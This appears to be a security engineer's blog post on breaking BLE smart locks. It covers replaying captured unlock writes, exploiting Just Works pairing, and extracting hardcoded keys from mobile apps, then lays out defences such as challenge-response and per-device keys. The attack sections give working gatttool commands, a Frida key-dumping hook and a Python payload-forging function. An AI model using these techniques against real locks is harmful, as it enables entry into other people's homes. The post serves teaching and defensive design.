A security engineer hands you their new smart lock. It passed FCC certification, the mobile app has four stars, and the marketing copy mentions "military-grade encryption." You have a laptop, a BLE dongle, and about two hours. By the time you're done, you can open their front door from the parking lot.
This is not a hypothetical.
I want to walk through how that actually happens, step by step, on real hardware. Not a theoretical model of what "could" be exploited, but what you do, what you look for, and where these products consistently break.
Attack 1: Replay the Unlock Command
This is the most common failure I see, and it's embarrassing how often it works.
The vulnerability
The lock communicates over BLE. The mobile app sends an "unlock" GATT write to a specific characteristic. The lock checks the value, decides it looks right, and opens. No challenge-response. No nonce. No timestamp. The same byte sequence that opened the door at 9 AM will open it at 9 PM, or next Tuesday.
The exploitation method
You don't need to know anything about the protocol to pull this off.
- Open Wireshark with a BLE capture plugin, or use `btlejuice`/`bettercap` with BLE sniffing enabled.
- Stand near the target, wait for the legitimate owner to unlock the door, and capture the full HCI log.
- Identify the GATT write packet. In Wireshark, filter on `btatt.opcode == 0x52` (Write Command) or `0x12` (Write Request). You're looking for writes to a handle associated with a service UUID that isn't standard (not battery, not GAP).
- Replay that exact write to the same handle using `gatttool` or `gatt.py`:

gatttool -b AA:BB:CC:DD:EE:FF --char-write-req -a 0x0025 -n 4f50454e
The lock opens.
The attacker workflow here is passive first, then active. You spend most of your time just watching traffic. The replay itself takes under a minute.
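If you'd rather script the triage than eyeball Wireshark, the ATT write PDU is simple enough to parse by hand: one opcode byte, a little-endian 16-bit handle, then the value. A minimal sketch in Python (the PDU bytes here are synthetic, and `parse_att_write` is my own helper name, not part of any tool above):

```python
import struct

ATT_WRITE_REQ = 0x12  # Write Request
ATT_WRITE_CMD = 0x52  # Write Command

def parse_att_write(pdu: bytes):
    """Return (handle, value) if the PDU is an ATT write, else None."""
    if len(pdu) < 3 or pdu[0] not in (ATT_WRITE_REQ, ATT_WRITE_CMD):
        return None
    handle = struct.unpack_from("<H", pdu, 1)[0]  # little-endian handle
    return handle, pdu[3:]

# Synthetic capture: Write Command to handle 0x0025 carrying "OPEN"
pdu = bytes([ATT_WRITE_CMD, 0x25, 0x00]) + bytes.fromhex("4f50454e")
print(parse_att_write(pdu))  # (37, b'OPEN')
```

Run this over every ATT PDU in the capture and the unlock write usually stands out immediately: it is the only write to a vendor handle that coincides with the door opening.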
Real-world impact
An attacker sitting in a car near someone's house can capture the unlock during morning departure and replay it that afternoon. No tools beyond a laptop and a $15 BLE dongle. No malware, no account compromise, no social engineering.
The unlock command is effectively a static password transmitted in cleartext.
Attack 2: GATT Authentication Gaps
Even when the vendor encrypts the connection, the GATT layer often has no real authorization model.
The vulnerability
BLE LE Secure Connections encrypts the link. But encryption is not authentication. Once you have an encrypted connection, the question is: which characteristics require authentication, and what does "authenticated" actually mean?
On a surprising number of locks, the answer is: the characteristic just exists, and any connected peer can write to it. The lock pairs with "Just Works" (no passkey, no OOB), which means any device can pair, and once paired, any device is "authenticated."
The exploitation method
- Use `nRF Connect` (mobile) or `bleah`/`gattacker` to scan and enumerate the lock's GATT profile without pairing.
- Look for writable characteristics outside the standard BLE profiles. UUID `0x2A00` is the device name; `0x2A37` is heart rate. Non-standard UUIDs (128-bit, vendor-specific) are where the interesting stuff lives.
- Attempt a pairing with Just Works. Most consumer locks will accept it because they need to be user-friendly out of the box.
- Walk through the writable characteristics and send known unlock payloads: `0x01` (simple boolean flag), `4f50454e` ("OPEN" in ASCII), `deadbeef` (padding test).
On some devices I've tested, the unlock characteristic is readable too, which will tell you exactly what the current expected value is.
# enumerate
bleah -a AA:BB:CC:DD:EE:FF
# write to target characteristic after pairing
gatttool -b AA:BB:CC:DD:EE:FF -t random --sec-level=high \
--char-write-req -a 0x002b -n 01
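During the enumeration step, a quick way to separate vendor characteristics from standard ones is to check whether each UUID sits in the Bluetooth SIG base range (0000xxxx-0000-1000-8000-00805F9B34FB); anything outside it is vendor-specific and worth a closer look. A rough filter, sketched in Python (`is_vendor_specific` is my name for it, not a library call):

```python
import uuid

# SIG-assigned UUIDs embed a short value in the Bluetooth base UUID;
# everything else is vendor-defined.
BT_BASE_SUFFIX = "-0000-1000-8000-00805f9b34fb"

def is_vendor_specific(u: str) -> bool:
    return not str(uuid.UUID(u)).endswith(BT_BASE_SUFFIX)

print(is_vendor_specific("00002a00-0000-1000-8000-00805f9b34fb"))  # False: Device Name
print(is_vendor_specific("6e400002-b5a3-f393-e0a9-e50e24dcca9e"))  # True: vendor UUID
```

Feed the enumerated characteristic UUIDs through this and you usually end up with a shortlist of two or three candidates to probe.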
Real-world impact
An attacker near the lock pairs once, writes to the unlock characteristic, and the door opens. No app. No credentials. The Just Works pairing model provides zero assurance about who is on the other end of the connection, and the lack of characteristic-level authorization means the lock cannot distinguish the legitimate app from a random script.
Attack 3: The Secret Was in the APK the Whole Time
When encryption is present and the GATT profile looks locked down, the next place to look is the mobile app itself.
The vulnerability
Many BLE lock implementations use a shared secret to authenticate the unlock command. The lock expects a specific HMAC or AES-encrypted payload. The app constructs this payload on the client side using a key embedded in the app binary or stored in a config file. The key never changes across users or devices.
This is fundamentally broken. A shared static key embedded in a distributed binary is not a secret.
The exploitation method
- Pull the APK: `adb backup` for debug builds, or download it from a third-party mirror.
- Decompile with `jadx` or `apktool`:

jadx -d output/ target.apk

- Search for likely key material:

grep -r "AES\|HMAC\|secret\|key\|unlock" output/ --include="*.java" -l

- Look at the class handling BLE writes. You're looking for the function that constructs the characteristic value before sending it. It usually calls something like `cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec)`.
- Extract the hardcoded key, nonce, or seed. In several cases I've seen 16-byte AES keys just sitting in a `static final byte[]` array.
- With the key in hand, you can generate valid unlock payloads for any device using that firmware version.
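To make that last step concrete, here is what payload generation looks like once a shared key has fallen out of the APK. The layout (command plus truncated HMAC tag) and the key bytes are illustrative stand-ins, not any specific vendor's scheme:

```python
import hashlib
import hmac

# Illustrative only: stands in for a key recovered from a `static final byte[]`
EXTRACTED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")

def forge_unlock_payload(key: bytes, command: bytes = b"OPEN") -> bytes:
    """Command followed by a truncated HMAC-SHA256 tag. Real layouts vary
    per firmware, but the point stands: anyone holding the key can sign."""
    tag = hmac.new(key, command, hashlib.sha256).digest()[:8]
    return command + tag

payload = forge_unlock_payload(EXTRACTED_KEY)
print(len(payload), payload[:4])  # 12 b'OPEN'
```

Note what's missing: no nonce, no timestamp, no per-device input. The same twelve bytes are valid forever, on every unit shipped with that key.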
If the app is React Native or Flutter, the logic often lives in JavaScript or Dart bundles that are trivially readable without decompilation. If it's native, you may need a pass with Frida to hook the key derivation at runtime:
// Frida snippet targeting javax.crypto.spec.SecretKeySpec
Java.perform(function () {
    var SecretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec');
    SecretKeySpec.$init.overload('[B', 'java.lang.String').implementation = function (key, algo) {
        // key arrives as an array of signed Java bytes; render it as hex
        var hex = '';
        for (var i = 0; i < key.length; i++) {
            hex += ('0' + (key[i] & 0xff).toString(16)).slice(-2);
        }
        console.log('Key material (' + algo + '): ' + hex);
        return this.$init(key, algo);
    };
});
Real-world impact
One extracted key compromises every lock using that firmware. You're not attacking one door. You're attacking the entire product line. This has happened in the wild. Lock vendors have shipped identical keys across millions of units, and once that key surfaces in a forum or a GitHub repo, the product is effectively broken for every customer simultaneously.
Why These Failures Keep Shipping
It is worth saying plainly: these are not hard problems to solve. The engineering community has known how to do challenge-response authentication, rolling codes, and proper key management for decades.
What actually happens in production is a combination of factors:
Firmware teams and app teams don't talk. The lock firmware engineer assumes the app will enforce authentication. The app engineer assumes the lock enforces it. Neither writes it down. Neither tests for it.
"Works in the demo" is the only test. The happy path ships. Nobody runs a threat model. Nobody sits next to the lock with a sniffer before launch.
Consumer pressure on pairing UX. Just Works exists because passkey entry on a door lock is terrible user experience. The alternative, LE Secure Connections with OOB, requires NFC or QR-code provisioning flows that add cost and complexity. Vendors skip it.
Key management is genuinely hard. Per-device key provisioning during manufacturing, cloud-backed key rotation, and secure key storage on constrained embedded hardware are all solvable problems, but they require investment. A startup trying to ship does not always make that investment.
What a Defensible Architecture Actually Looks Like
Rolling codes, or at minimum a challenge-response protocol, should be non-negotiable. The lock sends a random nonce on connection. The app responds with HMAC-SHA256(nonce + timestamp, per-device-key). The lock verifies it. Static replay is dead.
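The whole exchange fits in a few lines. A sketch of both ends in Python, assuming a per-device key is already provisioned and a ±30-second freshness window (the function names and exact message layout are mine, not a standard):

```python
import hashlib
import hmac
import os
import struct
import time

WINDOW = 30  # seconds of clock skew tolerated before a response is stale

def lock_challenge() -> bytes:
    return os.urandom(16)  # fresh nonce per connection kills static replay

def app_response(nonce: bytes, key: bytes, now=None) -> bytes:
    ts = struct.pack(">Q", int(time.time()) if now is None else now)
    return ts + hmac.new(key, nonce + ts, hashlib.sha256).digest()

def lock_verify(nonce: bytes, resp: bytes, key: bytes, now=None) -> bool:
    ts_raw, tag = resp[:8], resp[8:]
    now = int(time.time()) if now is None else now
    if abs(now - struct.unpack(">Q", ts_raw)[0]) > WINDOW:
        return False  # stale timestamp: replayed outside the window
    expected = hmac.new(key, nonce + ts_raw, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)  # constant-time compare

key = os.urandom(32)            # per-device key, provisioned at manufacture
nonce = lock_challenge()
resp = app_response(nonce, key)
print(lock_verify(nonce, resp, key))             # True
print(lock_verify(lock_challenge(), resp, key))  # False: wrong nonce
```

A captured response is useless against the next connection (different nonce) and useless after the window closes (stale timestamp). That is the entire fix for Attack 1.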
Per-device provisioning means each lock gets a unique key during manufacturing, stored in a hardware-backed secure element if the SoC supports it (most do today, even cheap ones). The mobile app receives the key during pairing via the cloud backend, not baked into the APK.
Characteristic-level authorization should be explicit. Writable unlock characteristics should require an authenticated session, not just an encrypted connection. Use BLE Security Mode 1, Level 3 (authenticated pairing with encryption) or Level 4 (LE Secure Connections) and enforce it at the attribute permission level.
OTA updates need signed firmware. If your lock accepts arbitrary firmware over BLE, you do not have a smart lock. You have a remotely-programmable deadbolt. ECDSA signature verification over the update image before flashing is table stakes.
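The verification side of signed OTA is small; the cost is in key handling, not code. A sketch using the `cryptography` package (the in-process key generation here stands in for a vendor signing key that would live in the build pipeline, with only the public half baked into the bootloader):

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Build-pipeline side: the private key never leaves the vendor's HSM.
signing_key = ec.generate_private_key(ec.SECP256R1())
public_key = signing_key.public_key()  # this half ships in the bootloader

firmware = b"\x7fFWIMG" + bytes(64)  # stand-in for an update image
signature = signing_key.sign(firmware, ec.ECDSA(hashes.SHA256()))

def bootloader_accepts(image: bytes, sig: bytes) -> bool:
    """Verify before flashing; any bit flip in the image must fail."""
    try:
        public_key.verify(sig, image, ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False

print(bootloader_accepts(firmware, signature))            # True
print(bootloader_accepts(firmware + b"\x00", signature))  # False
```

On the real device this check runs in the bootloader against a hash of the staged image, before anything is written to the active slot.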
App-side secrets are not secrets. If your protocol requires the mobile app to know a key, that key is public. Design protocols that assume a compromised client.
Where This Leaves Us
The locks I have tested that fail these checks are not obscure hardware from fly-by-night vendors. They are products with real market share, positive reviews, and "smart home compatible" badges. The vulnerabilities are not sophisticated. They are boring, and they are repeatable.
If you are building a lock or evaluating one, the bar is not that high. Rolling codes and per-device keys take a few weeks of engineering work. What it requires is actually running the threat model, and not shipping until it passes.
The attacker's workflow I described above takes an afternoon. Your defense should take more than that.